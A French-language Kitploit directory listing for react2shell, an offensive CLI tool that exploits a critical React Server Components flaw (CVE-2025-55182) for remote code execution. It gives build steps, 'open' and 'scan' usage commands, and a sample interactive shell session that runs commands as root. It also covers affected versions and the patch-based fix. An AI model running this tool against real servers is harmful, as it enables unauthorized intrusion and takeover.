Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/mantvmass/react2shell
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceArchived
GitHubmantvmass/react2shell

react2shell

Un outil CLI qui exploite les vulnérabilités des React Server Components et des Server Actions (CVE-2025-55182, CVE-2025-66478) afin d'obtenir une exécution de code à distance (RCE) sur des serveurs vulnérables.

Voir le dépôt
2il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

React2Shell

Un outil CLI permettant d'exploiter les vulnérabilités de pollution de prototypes dans React Server Components / Server Actions (CVE-2025-55182 et CVE-2025-66478), permettant l'exécution de code à distance (RCE) sur des serveurs vulnérables.

PoC original : https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc

AVERTISSEMENT : cet outil cible une vulnérabilité critique (CVSS 10.0) activement exploitée dans la nature. Utilisez-le uniquement sur des systèmes que vous possédez ou que vous êtes explicitement autorisé à tester.

Avertissement légal

Cet outil est destiné uniquement à des fins éducatives, aux tests de sécurité autorisés, aux tests d'intrusion effectués avec permission et à la recherche de vulnérabilités.

L'auteur et les contributeurs déclinent toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques résultant de l'utilisation de cet outil. Vous êtes entièrement responsable de veiller à ce que votre utilisation respecte toutes les lois, réglementations et conditions d'utilisation applicables.

L'utilisation non autorisée contre des systèmes sans permission est illégale dans la plupart des juridictions et peut entraîner de lourdes sanctions.

Installation

Depuis les sources

root@kitploit:~
git clone https://github.com/mantvmass/react2shell.git
cd react2shell
cargo build --release

Le binaire se trouvera dans target/release/react2shell (ou react2shell.exe sous Windows).

Binaires précompilés

Téléchargez-les depuis la page Releases.

Utilisation

root@kitploit:~
react2shell [COMMAND] [SOURCE]

Commandes

  • open <URL> : Ouvre un shell inversé interactif sur la cible (si vulnérable).
  • scan <FILE> : Analyse une liste de cibles à partir d'un fichier (une URL par ligne) pour détecter la vulnérabilité.

Exemples

root@kitploit:~
# Open interactive shell
react2shell open http://vulnerable-target.com

# Scan multiple targets
react2shell scan targets.txt

# Scan single target
react2shell scan http://127.0.0.1:3000

Exemples de shell interactif

root@kitploit:~
[email protected]:3000 (js)
$ /help                                                    # Display all supported commands
Commands;
  /new <URL> ; Switch URL target                           # Switch URL target
  /use exec ; Execute command and wait for output          # Switch to exec mode (waits for result)
  /use exec-no-wait ; Execute command without waiting      # Exec mode without waiting for output
  /use js ; Execute JavaScript code                        # Switch back to JavaScript mode
  /set timeout <ms> ; Set command timeout in milliseconds  # Configure command timeout
  /show options ; Show current configuration               # Display current shell settings
  /clear ; Clear screen                                    # Clear the terminal screen
  /exit or /quit ; Exit the shell                          # Exit the interactive shell

Examples;
  ls -la                                                 # Example Linux command
  whoami                                                 # Show current system user
  console.log('Hello')                                   # Example JavaScript command

[email protected]:3000 (js)
$ /use exec                                              # Switch from JS mode to exec mode
[+] Switch shell mode to exec

[email protected]:3000 (exec)
$ whoami                                                 # Verify current execution user
root                                                     # Command output

Versions concernées

Next.js

Les applications utilisant React Server Components avec App Router sont concernées lorsqu'elles exécutent les versions suivantes :

  • Next.js 15.x
  • Next.js 16.x
  • Next.js 14.3.0-canary.77 et les versions canary ultérieures

Les éléments suivants ne sont pas concernés :

  • Next.js 13.x
  • Next.js 14.x (versions stables)
  • Les applications utilisant Pages Router
  • Les déploiements Edge Runtime

React

La vulnérabilité est présente dans les versions 19.0, 19.1.0, 19.1.1 et 19.2.0 de React au sein des paquets suivants :

  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack

La mise à niveau immédiate vers des versions corrigées est fortement recommandée, en particulier pour les environnements de production.

Atténuation

La principale solution consiste à mettre à niveau vers les versions corrigées de React et Next.js.

Pour les applications Next.js, utilisez le correcteur automatisé officiel :

root@kitploit:~
npx fix-react2shell-next

Plus d'informations : vercel-labs/fix-react2shell-next

Consultez les avis officiels :

  • React : https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • Next.js : https://nextjs.org/blog/CVE-2025-66478

Licence

Ce projet est publié uniquement à des fins éducatives et de recherche en sécurité autorisée. Toute responsabilité d'utilisation incombe à l'utilisateur final.

Télécharger l’outil